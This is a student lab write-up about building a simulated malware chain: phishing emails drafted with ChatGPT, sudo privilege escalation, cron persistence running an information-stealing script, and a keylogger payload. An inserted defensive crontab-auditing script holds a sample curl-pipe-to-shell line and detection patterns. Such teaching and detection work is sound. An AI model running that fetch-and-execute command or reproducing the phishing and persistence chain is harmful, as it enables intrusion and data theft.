Malware Lab Winter 2024

Lab focused on creating malware payloads



In this lab, we delved into how malware is able to attack our systems, and how to even develop our own, from developing phishing emails to writing scripts to execute malicious code on a system.

INITIAL FOOTHOLD

Although most forms of malware can be avoided if users are cautious about how they use their devices, the wide variety of ways in which malware can infect a device has allowed frequent infections of devices globally. The more common infection vectors include phishing emails, websites offering free services, download-button spam, and fake software installers.

In this lab, we created our own phishing emails to infect the unwary user. With the recent advancements in AI, we were able to use ChatGPT to develop a basic template for such an email. Then, with some simple code, we successfully delivered the emails using HTML and Python.

PRIVILEGE ESCALATION

Privilege escalation is the process of gaining higher permissions than the current user has. While there are many ways to obtain this, the method we chose was to directly ask the user for permission. This was done through the sudo command, which would be invoked when our 'victim' downloaded and ran the file delivered by the earlier phishing email.

PERSISTENCE

Persistence is the ability of malware to maintain its presence and control over a compromised system over an extended period. Persistent malware allows the attacker to keep gathering up-to-date information and thus to sustain the attack. We implemented persistence in our malware through cron, a time-based task scheduling system in Unix-like operating systems where users can schedule tasks, known as "cron jobs", to run at specific times. We used a cron job that periodically runs a script that steals a target's information.

Types of Persistence

  • Timed: scheduled tasks
  • Hooks: restart tasks, shell profile scripts, etc.
  • Integration: kernel-level modifications, binary replacement, BIOS firmware hijacking, AD infection, etc.
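The defender's counterpart to the timed persistence described above is auditing the scheduler itself. The following is an added example, not code from the lab, that parses crontab-style entries and flags the traits that typically distinguish a planted job from legitimate maintenance: very frequent or at-boot schedules, commands living in world-writable temp directories or hidden directories, and download-and-pipe-to-shell one-liners. The crontab text is constructed for illustration; the path heuristics are assumptions a team would tune to its own environment.

```python
import re
import sys

# Constructed sample crontab content for the demo (not from any real system).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
* * * * * /tmp/.cache/update.py
@reboot /home/alice/.config/.sync/collect.sh
0 * * * * curl -s http://example.invalid/p.sh | sh
30 6 * * 1 /usr/bin/apt-get update
"""

# Heuristics (assumed; tune per environment).
SUSPICIOUS_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_]\w*=")


def parse_crontab(text):
    """Return a list of (schedule, command) tuples.

    Comments, blank lines and environment assignments (PATH=..., MAILTO=...)
    are skipped. '@reboot'-style macros are kept as a single schedule token.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry, nothing to schedule
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append((schedule, command.strip()))
    return entries


def audit_crontab(text):
    """Return a list of (schedule, command, reasons) for entries worth review."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        if schedule == "@reboot":
            reasons.append("runs at every boot")
        if any(p in command for p in SUSPICIOUS_PATHS):
            reasons.append("command lives in a world-writable temp directory")
        if HIDDEN_DIR.search(command):
            reasons.append("command lives in a hidden directory")
        if PIPE_TO_SHELL.search(command):
            reasons.append("downloads content and pipes it to a shell")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


if __name__ == "__main__":
    # Audit files given on the command line, or the built-in sample otherwise.
    sources = [open(p).read() for p in sys.argv[1:]] or [SAMPLE_CRONTAB]
    for text in sources:
        for schedule, command, reasons in audit_crontab(text):
            print(f"[{schedule}] {command}\n    -> {'; '.join(reasons)}")
```

Run against `/etc/crontab`, the files under `/etc/cron.d/`, and each user's spool (`crontab -l -u <user>` output saved to a file) to get a review list; the three flagged sample entries are the ones that match the lab's own persistence pattern, while the certbot, backup and apt-get jobs pass unflagged.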

FINAL PAYLOAD

The final payload depends on what the attacker decides to do with the information they are able to access and gain. Different people have different motives when they attack. Some examples include selling the information, deleting or modifying the user's information and files, installing adware or malware, injecting viruses, using ransomware, or even mining cryptocurrency.

In our case, we chose to install a keylogger onto the computer after sending the data off the machine.


This was the keylogger we attempted to install onto the machine we infected.

There is also the option of brute-forcing passwords to get into the machines with a password cracker.

ROADBLOCKS

Graphics Servers

Certain actions, like launching a web browser or downloading the keylogger, seemed to fail because the root user does not have access to a usable graphics (display) server for the programs it runs.

Executable Bundling

PyInstaller, the program we used to turn the Python script into a single executable, makes paths such as the location of the Python script inside the bundle more complicated to determine. We also did not have time to figure out why the executable only worked in the specific location it was created in.